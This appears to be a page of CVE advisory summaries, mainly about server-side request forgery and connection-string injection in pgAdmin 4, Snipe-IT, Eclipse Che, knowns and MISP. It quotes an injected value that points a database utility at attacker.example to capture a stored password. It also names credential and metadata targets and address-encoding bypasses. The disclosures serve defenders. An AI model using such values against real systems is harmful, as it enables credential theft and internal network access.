Title
pgAdmin 4: Connection-string injection via the database field in the Restore and Maintenance tools
Summary
pgAdmin 4's Restore and Maintenance tools passed the client-supplied 'database' field directly as the value of the --dbname option given to pg_restore and psql. libpq expands a database name containing an equals sign into a full connection string, and connection keywords embedded in that value take precedence over the --host and --port arguments that pgAdmin supplies. A value such as 'host=attacker.example port=5432 dbname=x' therefore redirected the utility to a server chosen by the requesting user rather than the server the operation was invoked against. Because pgAdmin exports the decrypted stored database password in the PGPASSWORD environment variable before executing the utility, the redirected connection presents that credential to the attacker-nominated endpoint, which may capture it. The redirection additionally permits outbound connections from the pgAdmin host to arbitrary network addresses, including hosts not otherwise reachable by the requesting user. The behaviour is reachable by any authenticated user holding the tools_restore or tools_maintenance permission, both of which the default User role grants. The Maintenance tool was not affected in the earliest releases, where the value was wrapped by a quoting helper that incidentally prevented expansion; it became affected when that wrapper was removed. The fix supplies the target database in the PGDATABASE environment variable, which libpq treats as a literal database name and never expands as a connection string. Where pg_restore requires a --dbname argument to be present, an empty value is passed, which contains no equals sign and is therefore not expanded, while the real name is taken from the environment. This issue affects pgAdmin 4: from the introduction of the --dbname argument in the Restore and Maintenance tools before 9.18.

CVE-2026-86771 (GCVE-0-2026-86771)

Vulnerability from cvelistv5 – Published: 2026-09-09 13:32 – Updated: 2026-09-09 14:06

Title
Snipe-IT before 8.7.0 Server-Side Request Forgery via employee_num
Summary
Snipe-IT versions before 8.7.0 fail to HTML-escape the employee_num field in the acceptance PDF generator, allowing attackers with users.edit permission to inject img tags into TCPDF's writeHTML() function. Attackers can craft a malicious employee_num value containing an img tag with an arbitrary HTTP(S) URL to trigger server-side requests to internal services, cloud metadata endpoints, or external targets when a victim signs an asset acceptance.

Title
snipe-it before 8.7.0 SSRF via IPv6 transition address bypass
Summary
snipe-it versions before 8.7.0 contain a server-side request forgery vulnerability in the ExternalUrl validation rule that fails to detect IPv6 transition addresses encoding private IPv4 targets. Attackers with super-admin privileges can configure webhook URLs using NAT64, 6to4, or Teredo transition addresses to bypass SSRF guards and access internal services or cloud metadata endpoints.

CVE-2026-86671 (GCVE-0-2026-86671)

Vulnerability from cvelistv5 – Published: 2026-10-05 16:21 – Updated: 2026-10-05 19:03
VLAI
Summary
In Eclipse Che versions 7.29.0 and later, the GET `/api/scm/resolve` and `POST /api/factory/resolver` endpoints pass an attacker-controlled URL to `URLFetcher.fetch()`, which calls `new URL(url).openConnection()` with no scheme or host allow-list and returns the response body to the caller. Any authenticated Che user can read arbitrary local files via the file:// scheme (including the pod's Kubernetes service-account token at `file:///var/run/secrets/kubernetes.io/serviceaccount/token`), reach internal HTTP services and cloud instance metadata endpoints (169.254.169.254), and have their stored SCM personal access token attached as an `Authorization` header to a host of their choosing. The same credential-forwarding behavior also fires when a victim opens a workspace from a malicious devfile whose `parent.uri` points to an attacker-controlled server, enabling exfiltration of the victim's SCM PAT without direct API access. No fix is available.

CVE-2026-86590 (GCVE-0-2026-86590)

Vulnerability from cvelistv5 – Published: 2026-09-08 09:15 – Updated: 2026-09-08 12:22
VLAI
Summary
In Eclipse Che versions 7.79.0 through 7.121.0, the dashboard backend's POST /dashboard/api/data/resolver endpoint passes a caller-supplied URL directly to an outbound HTTP GET request with no host filtering. An authenticated user can exploit this server-side request forgery (SSRF) to read responses from internal network addresses, including the cloud instance metadata service (169.254.169.254), loopback interfaces, RFC-1918 private ranges, and in-cluster Kubernetes services. The operator-configured allowlist (spec.devEnvironments.allowedSources.urls) is not consulted. The vulnerability is fixed in version 7.122.0, which adds private-address blocking, IPv4-mapped IPv6 bypass prevention, operator allowlist enforcement, and disables HTTP redirects on the outbound request.

Title
knowns through 0.33.0 Server-Side Request Forgery via embedding-models endpoint
Summary
knowns through 0.33.0 contains a server-side request forgery vulnerability in the POST /api/embedding-models/test endpoint that issues outbound requests to caller-supplied destinations without validation. Attackers can enumerate internal hosts and cloud metadata endpoints by observing transport error messages that reveal network reachability information.

Title
MISP Insufficient Outbound URL Validation Allows SSRF and Credential Disclosure via Feed Redirects and TAXII Discovery
Summary
Affected versions of MISP contain insufficient validation of server-side outbound HTTP destinations in feed retrieval and TAXII discovery functionality. In feed processing, redirects were followed without validating the redirect scheme or destination. The original request headers were reused across redirect hops, meaning authentication headers or API credentials configured for a feed could be forwarded to a different host. Redirects could also target internal network resources, resulting in SSRF. The fix adds redirect validation, blocks internal destinations for cross-host redirects, strips configured feed credentials before following redirects to another host, and pins validated DNS results to prevent re-resolution after validation. The TAXII discovery endpoint had a related incomplete SSRF defense. It used gethostbyname() and compared the result against only a few literal addresses. This missed cases including IPv6 loopback (::1), numeric host encodings such as 0x7f000001, and potentially multiple DNS records. The fix moves TAXII discovery to the shared URL egress validator. Together, these commits harden MISP's outbound URL handling against alternate-address representations, DNS-related bypasses, unsafe redirects, internal-host access, and cross-host credential forwarding. CAPEC-664: Server Side Request Forgery

An adversary exploits improper input validation by submitting maliciously crafted input to a target application running on a server, with the goal of forcing the server to make a request either to itself, to web services running in the server’s internal network, or to external third parties. If successful, the adversary’s request will be made with the server’s privilege level, bypassing its authentication controls. This ultimately allows the adversary to access sensitive data, execute commands on the server’s network, and make external requests with the stolen identity of the server. Server Side Request Forgery attacks differ from Cross Site Request Forgery attacks in that they target the server itself, whereas CSRF attacks exploit an insecure user authentication mechanism to perform unauthorized actions on the user's behalf.
